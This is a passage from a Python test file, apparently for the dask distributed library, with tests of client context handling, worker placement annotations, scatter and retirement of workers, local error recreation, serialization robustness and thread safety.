with temp_default_client(c2):
assert default_client() is c2
assert default_client(c1) is c1
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_as_current(c, s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
with temp_default_client(c):
assert Client.current() is c
with pytest.raises(ValueError):
Client.current(allow_global=False)
with c1.as_current():
assert Client.current() is c1
assert Client.current(allow_global=True) is c1
with c2.as_current():
assert Client.current() is c2
assert Client.current(allow_global=True) is c2
await c1.close()
await c2.close()
def test_as_current_is_thread_local(s):
l1 = threading.Lock()
l2 = threading.Lock()
l3 = threading.Lock()
l4 = threading.Lock()
l1.acquire()
l2.acquire()
l3.acquire()
l4.acquire()
def run1():
with Client(s["address"]) as c:
with c.as_current():
l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.acquire()
l4.release()
def run2():
with Client(s["address"]) as c:
with c.as_current():
l1.release()
l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
l4.acquire()
t1 = threading.Thread(target=run1)
t2 = threading.Thread(target=run2)
t1.start()
t2.start()
t1.join()
t2.join()
@gen_cluster()
async def test_as_current_is_task_local(s, a, b):
l1 = asyncio.Lock()
l2 = asyncio.Lock()
l3 = asyncio.Lock()
l4 = asyncio.Lock()
await l1.acquire()
await l2.acquire()
await l3.acquire()
await l4.acquire()
async def run1():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
await l1.acquire()
l2.release()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
await l3.acquire()
l4.release()
async def run2():
async with Client(s.address, asynchronous=True) as c:
with c.as_current():
l1.release()
await l2.acquire()
try:
# This line runs only when both run1 and run2 are inside the
# context manager
assert Client.current(allow_global=False) is c
finally:
l3.release()
await l4.acquire()
await asyncio.gather(run1(), run2())
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=False):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=False):
total = delayed(sum)(L1)
with dask.annotate(workers=c.address, allow_other_workers=True):
L2 = [delayed(add)(i, total) for i in L1]
with dask.annotate(workers=b.address, allow_other_workers=True):
total2 = delayed(sum)(L2)
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.persist(L1 + L2 + [total, total2], optimize_graph=False)
await wait(out)
assert all(v.key in a.data for v in L1)
assert total.key in b.data
assert s.loose_restrictions == {total2.key} | {v.key for v in L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers_annotate2(e, s, a, b, c):
def key_to_worker(key):
return a.address
L1 = [delayed(inc)(i) for i in range(4)]
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
with dask.annotate(workers=key_to_worker):
out = e.persist(L1, optimize_graph=False)
await wait(out)
for x in L1:
assert all(layer.annotations is None for layer in x.dask.layers.values())
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
@nodebug # test timing is fragile
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_persist_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
total2 = delayed(sum)(L2)
out = e.persist(
L1 + L2 + [total, total2],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total, total2]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key, total2.key} | {v.key for v in L1 + L2}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers_annotate(e, s, a, b, c):
with dask.annotate(workers=a.address, allow_other_workers=True):
L1 = [delayed(inc)(i) for i in range(4)]
with dask.annotate(workers=b.address, allow_other_workers=True):
total = delayed(sum)(L1)
with dask.annotate(workers=[c.address]):
L2 = [delayed(add)(i, total) for i in L1]
# TODO: once annotations are faithfully forwarded upon graph optimization,
# we shouldn't need to disable that here.
out = e.compute(L1 + L2 + [total], optimize_graph=False)
await wait(out)
for v in L1:
assert s.worker_restrictions[v.key] == {a.address}
for v in L2:
assert s.worker_restrictions[v.key] == {c.address}
assert s.worker_restrictions[total.key] == {b.address}
assert s.loose_restrictions == {total.key} | {v.key for v in L1}
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 3, client=True)
async def test_compute_workers(e, s, a, b, c):
L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
[future] = await c.scatter([1])
assert future.type == int
d = await c.scatter({"x": 1.0})
assert d["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
assert await c.gather(futures) == list(range(100))
# Don't count how many task landed on each worker.
# Normally, tasks would be distributed evenly over the surviving workers. However,
# here all workers share the same process memory, so you'll get an unintuitive
# distribution of tasks if for any reason one transfer take longer than 2 seconds
# and as a consequence the Active Memory Manager ends up running for two iterations.
# This is something that will happen more frequently on low-powered CI machines.
# See test_active_memory_manager.py for tests that robustly verify the statistical
# distribution of tasks after worker retirement.
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
await s.extensions["stealing"].stop()
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
await s.extensions["stealing"].stop()
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
while len(S) < 4:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2**20, chunks=2**10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
for key, start, finish, recommendations, _ in scheduler.transition_log:
if start == "memory" and finish == "released":
for k, v in recommendations.items():
assert not (k == key and v == "waiting")
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
await c.scatter({"a": 10}, workers=[a.address, b.address])
assert "a" in a.data or "a" in b.data
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
"""`await Client(...)` keeps retrying for 10 seconds if it can't find the Scheduler
straight away
"""
with dask.config.set({"distributed.comm.timeouts.connect": "10s"}):
c = Client("127.0.0.1:57484", asynchronous=True)
client_start_fut = asyncio.ensure_future(c)
await asyncio.sleep(2)
async with Scheduler(port=57484, dashboard_address=":0"):
await client_start_fut
assert await c.run_on_scheduler(lambda: 123) == 123
await c.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(L=None):
return sum(L)
future = c.submit(f, L=futures)
result = await future
assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
futures = await c.scatter([1, 2, 3])
def f(i, L=None):
return i + sum(L)
futures = c.map(f, range(10), L=futures)
results = await c.gather(futures)
assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
x = await c.scatter(1)
y = c.submit(slowinc, x, delay=0.5)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
key = x.key
del x
for i in range(5):
assert s.waiting_data[key]
await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(1)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)(x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
assert f.status == "pending"
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
assert f.status == "error"
assert function.__name__ == "div"
assert args == (1, 0)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
error_f = await c._get_errored_future(f)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
error_f = await c._get_errored_future(df3)
function, args, kwargs = await c._get_components_from_future(error_f)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
error_f = await c._get_errored_future(zz)
function, args, kwargs = await c._get_components_from_future(error_f)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(2)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)([x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: int(3628800 / (x + 1)))
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == [
3628800,
1814400,
1209600,
907200,
725760,
604800,
518400,
453600,
403200,
362880,
]
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
df2 = df.a.map(lambda x: x + 1)
f = c.compute(df2)
function, args, kwargs = await c._get_components_from_future(f)
expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
assert function(*args, **kwargs).equals(expected)
# with persist
df3 = c.persist(df2)
# recreate_task_locally only works with futures
with pytest.raises(AttributeError):
function, args, kwargs = await c._get_components_from_future(df3)
f = c.compute(df3)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
da = pytest.importorskip("dask.array")
z = (da.zeros((10, 10), chunks=10) + 1).sum()
f = c.compute(z)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
while a.status != Status.closed:
await asyncio.sleep(0.01)
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert distributed.foo == 123
finally:
del distributed.foo
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(
loop=loop,
processes=False,
dashboard_address=":0",
threads_per_worker=4,
) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
import distributed
client = get_client()
assert not client.asynchronous
assert client is distributed.tmp_client
future = client.submit(inc, x)
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=rf"^{msg}$"):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
"""Ensure that tasks scheduled from a seceded thread can be scheduled
elsewhere"""
def f(x):
client = get_client()
secede()
futures = client.map(inc, range(10), pure=False)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(10), workers=[a.address])
results = await c.gather(futures)
# We dispatch 10 tasks and every task generates 11 more tasks
# 10 * 11 + 10
assert a.executed_count + b.executed_count == 120
assert a.executed_count >= 10
assert b.executed_count > 0
assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_long_running_not_in_occupancy(c, s, a):
# https://github.com/dask/distributed/issues/5332
from distributed import Lock
l = Lock()
await l.acquire()
def long_running(lock):
sleep(0.1)
secede()
lock.acquire()
f = c.submit(long_running, l)
while f.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.workers[a.address].occupancy == parse_timedelta(
dask.config.get("distributed.scheduler.unknown-task-duration")
)
while s.workers[a.address].occupancy:
await asyncio.sleep(0.01)
await a.heartbeat()
ts = s.tasks[f.key]
ws = s.workers[a.address]
s.set_duration_estimate(ts, ws)
assert s.workers[a.address].occupancy == 0
s.reevaluate_occupancy(0)
assert s.workers[a.address].occupancy == 0
await l.release()
await f
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def func():
client = get_client()
f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
client.gather(f)
future = c.submit(func, key="f")
while len(s.tasks) != 2:
await asyncio.sleep(0.001)
# lower values schedule first
assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
s.tasks["f"].priority,
s.tasks["slowinc"].priority,
)
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def test_dynamic_workloads_sync(c):
future = c.submit(_dynamic_workload, 0, delay=0.02)
assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
future = c.submit(_dynamic_workload, 0, delay="random")
assert future.result(timeout=20) == 52
@pytest.mark.skipif(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = str
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = str
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
